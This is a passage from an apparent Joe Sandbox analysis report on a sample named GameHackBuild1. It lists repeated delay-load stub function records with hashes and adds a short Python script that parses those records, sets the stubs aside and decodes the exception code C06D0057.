                                      • Instruction ID: c2570ee941d0f6387bdda66961d75ad84755b5702ba4b05b712a9b0e4181297f
                                      • Opcode Fuzzy Hash: e7c21bf64cc90b0b8244626c2dd17d8e89993b7cc13099bbc1ef8b67731db4ae
                                      • Instruction Fuzzy Hash: CCB012B627C2017D714C21146F02EB6023DC1C1B103304F1AB205E004095805CC55431
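Every function record above follows one pattern: the only direct call is the MSVC CRT delay-load helper ___delayLoadHelper2@8, and the helper's own RaiseException(C06D0057, 0, 1, ?) path is listed as a subcall. These are compiler-generated import stubs, not the sample's own logic, and an analyst triaging the report wants to collapse them rather than read each one. The Python below is an added example, not part of the Joe Sandbox report or of its tooling: it parses records in the "APIs / Memory Dump Source / Joe Sandbox IDA Plugin / Similarity" layout shown on this page, groups them by API String ID, flags delay-load thunks, and decodes the exception code. The embedded sample is constructed from two of the records above plus one synthetic non-thunk record that is not from the report. Decoding 0xC06D0057 as severity 3 (error), facility 0x6D (FACILITY_VISUALCPP) and Win32 error 0x57 (ERROR_INVALID_PARAMETER) follows the NTSTATUS-style layout the CRT's VcppException macro produces; the field names and the `triage` function are this example's own.

```python
import re
from collections import defaultdict

# Constructed sample: two records copied from the report's function listing
# plus one SYNTHETIC record (Sleep.KERNEL32, not from the report) so the
# thunk filter has something to keep. Bullet characters are kept as on the page.
SAMPLE = """\
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
  • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
  • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
Memory Dump Source
• Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Instruction Fuzzy Hash: 0AB012B127D4017C310C61146E02E76026DC5C3B10330891AB60AD00C0D6409CC50531
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A1DBD5
  • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
  • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Instruction Fuzzy Hash: F3B012A637C002BC310C510C2E07EF7023CD0C0B10331891AB50AC1080D9404C894131
APIs
• Sleep.KERNEL32 ref: 00000000
Similarity
• API ID: Sleep
• String ID:
• API String ID: synthetic-0
"""

BULLET = re.compile(r"^•\s*(.*)$")
API_CALL = re.compile(r"^([A-Za-z0-9_@]+)\.([A-Z0-9]+)\b")          # Name.MODULE
RAISE = re.compile(r"RaiseException\.KERNEL32\(([0-9A-Fa-f]{8})")   # first argument
SECTIONS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Lookup tables are this example's own; only the values needed here are listed.
FACILITY_NAMES = {0x6D: "FACILITY_VISUALCPP"}
WIN32_ERROR_NAMES = {0x57: "ERROR_INVALID_PARAMETER",
                     0x7E: "ERROR_MOD_NOT_FOUND",
                     0x7F: "ERROR_PROC_NOT_FOUND"}


def decode_exception_code(code):
    """Split an NTSTATUS-layout code into severity (2 bits), facility (12), error (16)."""
    facility = (code >> 16) & 0x0FFF
    error = code & 0xFFFF
    return {"severity": code >> 30,
            "facility": facility,
            "facility_name": FACILITY_NAMES.get(facility, "unknown"),
            "error": error,
            "error_name": WIN32_ERROR_NAMES.get(error, "unknown")}


def parse_records(text):
    """One dict per function; a record starts at each 'APIs' heading."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                rec = {"apis": [], "raise_codes": [], "similarity": {}}
                records.append(rec)
            section = line
            continue
        m = BULLET.match(line)
        if rec is None or not m:
            continue
        body = m.group(1)
        if section == "APIs":
            if body.startswith("Part of subcall function"):
                # Subcalls belong to the helper, so keep only the code it raises.
                rec["raise_codes"] += [int(c, 16) for c in RAISE.findall(body)]
            elif (call := API_CALL.match(body)):
                rec["apis"].append(call.group(1) + "." + call.group(2))
        elif section == "Similarity":
            key, _, value = body.partition(":")
            rec["similarity"][key.strip()] = value.strip()
    return records


def is_delay_load_thunk(rec):
    """Compiler-generated import stub: the only direct call is the CRT helper."""
    return rec["apis"] == ["___delayLoadHelper2@8.DELAYIMP"]


def triage(records):
    """Group by Joe Sandbox's API String ID and separate stubs from real code."""
    groups = defaultdict(list)
    for rec in records:
        groups[rec["similarity"].get("API String ID", "?")].append(rec)
    return {"total": len(records),
            "delay_load_thunks": sum(is_delay_load_thunk(r) for r in records),
            "groups": {k: len(v) for k, v in groups.items()},
            "raise_codes": sorted({c for r in records for c in r["raise_codes"]}),
            "worth_reading": [r["apis"] for r in records if not is_delay_load_thunk(r)]}


if __name__ == "__main__":
    summary = triage(parse_records(SAMPLE))
    print(summary)
    for code in summary["raise_codes"]:
        print(hex(code), decode_exception_code(code))
```

Run over the full function listing, every record that shares API String ID 1269201914-0 and a single ___delayLoadHelper2@8 call can be set aside as a linker-emitted delay-load stub; the functions worth reversing are those left in the other groups. The exception code is worth decoding once: ERROR_INVALID_PARAMETER under the Visual C++ facility is what the helper raises when a delay-load descriptor fails its sanity checks, so its presence here reflects the CRT helper, not behaviour added by the malware author.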
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DC36
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: b2ce8a202078e254b0e4131d1ce2ae8a0b46fd1e26a5d8b14678746055e9e69e
                                      • Instruction ID: a6a7b4daaf8700e7862ea6bba01b47791c757f9cdc27d72aa92a176d0f955622
                                      • Opcode Fuzzy Hash: b2ce8a202078e254b0e4131d1ce2ae8a0b46fd1e26a5d8b14678746055e9e69e
                                      • Instruction Fuzzy Hash: 0DB012B627C1017C714C61186E02FB6023CC0C6B103308E1AB609D0080D5805C854531
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DC36
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 15fb63477872804a03d740686ca43b7fb0d593d832854b330e03d9ddda70e7f3
                                      • Instruction ID: 6f3118522208ead7561953dedd5b672129f1d28cd580ceaa1b892848ee835574
                                      • Opcode Fuzzy Hash: 15fb63477872804a03d740686ca43b7fb0d593d832854b330e03d9ddda70e7f3
                                      • Instruction Fuzzy Hash: C6B012B627C2017C714C61186E02FB6023CD0C1B103304E1BB209D0040D5805C854531
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 3f9a3c633e105ea2b13f4bf95974819bc579c793027e04aabee53e3d8b0e26e1
                                      • Instruction ID: 382bf7dff3a681c6c80096f0c31107bdebc7a4bcd408a214e1af25703a0194d4
                                      • Opcode Fuzzy Hash: 3f9a3c633e105ea2b13f4bf95974819bc579c793027e04aabee53e3d8b0e26e1
                                      • Instruction Fuzzy Hash: AFA001A66BD502BC710C6251AE56DBA022ED9C6BA17708D1AB54BA40C1A990698A5831
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: b2ae2355afd2b2fce17ede3f58cae2b1bf4040455bf9c51bb71c9139322a54b2
                                      • Instruction ID: 382bf7dff3a681c6c80096f0c31107bdebc7a4bcd408a214e1af25703a0194d4
                                      • Opcode Fuzzy Hash: b2ae2355afd2b2fce17ede3f58cae2b1bf4040455bf9c51bb71c9139322a54b2
                                      • Instruction Fuzzy Hash: AFA001A66BD502BC710C6251AE56DBA022ED9C6BA17708D1AB54BA40C1A990698A5831
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 91e89f141033e5652a8acddb27ebc24d17e5a1c8f9a5323488b18ff26e4f0882
                                      • Instruction ID: 382bf7dff3a681c6c80096f0c31107bdebc7a4bcd408a214e1af25703a0194d4
                                      • Opcode Fuzzy Hash: 91e89f141033e5652a8acddb27ebc24d17e5a1c8f9a5323488b18ff26e4f0882
                                      • Instruction Fuzzy Hash: AFA001A66BD502BC710C6251AE56DBA022ED9C6BA17708D1AB54BA40C1A990698A5831
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: e60613db6c6d6fdc4158fdb3b8265a77957b1e89671568d8d2a5b5addc0e7cde
                                      • Instruction ID: 382bf7dff3a681c6c80096f0c31107bdebc7a4bcd408a214e1af25703a0194d4
                                      • Opcode Fuzzy Hash: e60613db6c6d6fdc4158fdb3b8265a77957b1e89671568d8d2a5b5addc0e7cde
                                      • Instruction Fuzzy Hash: AFA001A66BD502BC710C6251AE56DBA022ED9C6BA17708D1AB54BA40C1A990698A5831
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: c7e14d571e3ff4cd598ad5b71d014c0fd4a29e742cedfb41a11e03bbec97c71a
                                      • Instruction ID: 382bf7dff3a681c6c80096f0c31107bdebc7a4bcd408a214e1af25703a0194d4
                                      • Opcode Fuzzy Hash: c7e14d571e3ff4cd598ad5b71d014c0fd4a29e742cedfb41a11e03bbec97c71a
                                      • Instruction Fuzzy Hash: AFA001A66BD502BC710C6251AE56DBA022ED9C6BA17708D1AB54BA40C1A990698A5831
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 2cf8a4c6f5ed938cc87f965f8e69e906362affc26e7fad1f5390c94324fb9b92
                                      • Instruction ID: 382bf7dff3a681c6c80096f0c31107bdebc7a4bcd408a214e1af25703a0194d4
                                      • Opcode Fuzzy Hash: 2cf8a4c6f5ed938cc87f965f8e69e906362affc26e7fad1f5390c94324fb9b92
                                      • Instruction Fuzzy Hash: AFA001A66BD502BC710C6251AE56DBA022ED9C6BA17708D1AB54BA40C1A990698A5831
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: ef32fc89b1e7c52bb249d65b4baf25757c053452e9369a65732dfc58d3198423
                                      • Instruction ID: 382bf7dff3a681c6c80096f0c31107bdebc7a4bcd408a214e1af25703a0194d4
                                      • Opcode Fuzzy Hash: ef32fc89b1e7c52bb249d65b4baf25757c053452e9369a65732dfc58d3198423
                                      • Instruction Fuzzy Hash: AFA001A66BD502BC710C6251AE56DBA022ED9C6BA17708D1AB54BA40C1A990698A5831
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 6a18f4ebb28102f1e5f42248e146a5f4c6f453105fd69cdad288e06830b0691e
                                      • Instruction ID: 382bf7dff3a681c6c80096f0c31107bdebc7a4bcd408a214e1af25703a0194d4
                                      • Opcode Fuzzy Hash: 6a18f4ebb28102f1e5f42248e146a5f4c6f453105fd69cdad288e06830b0691e
                                      • Instruction Fuzzy Hash: AFA001A66BD502BC710C6251AE56DBA022ED9C6BA17708D1AB54BA40C1A990698A5831
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: a41b6670e28c6f98f2768bf18830961f65673ad6d5532bad9cf94a0e7abb8105
                                      • Instruction ID: 382bf7dff3a681c6c80096f0c31107bdebc7a4bcd408a214e1af25703a0194d4
                                      • Opcode Fuzzy Hash: a41b6670e28c6f98f2768bf18830961f65673ad6d5532bad9cf94a0e7abb8105
                                      • Instruction Fuzzy Hash: AFA001A66BD502BC710C6251AE56DBA022ED9C6BA17708D1AB54BA40C1A990698A5831
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 8ed88764a7271fb3bd1f8b3206afceaf3a0aec6b08624ceb4f081050e543e894
                                      • Instruction ID: 382bf7dff3a681c6c80096f0c31107bdebc7a4bcd408a214e1af25703a0194d4
                                      • Opcode Fuzzy Hash: 8ed88764a7271fb3bd1f8b3206afceaf3a0aec6b08624ceb4f081050e543e894
                                      • Instruction Fuzzy Hash: AFA001A66BD502BC710C6251AE56DBA022ED9C6BA17708D1AB54BA40C1A990698A5831
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DAB2
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 8fb9c4f045a98b345d333e4a6b03a9efea09460bb1652f7651bb3c36068fe9e6
                                      • Instruction ID: 8f7e898b3a415174ec30bbd2154c361e54fde401779f2080b8694af8fae788ca
                                      • Opcode Fuzzy Hash: 8fb9c4f045a98b345d333e4a6b03a9efea09460bb1652f7651bb3c36068fe9e6
                                      • Instruction Fuzzy Hash: 1BA002A527D5017C7148B151AE16D7B025DD4D1B51734491AB50694045555459855431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DAB2
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
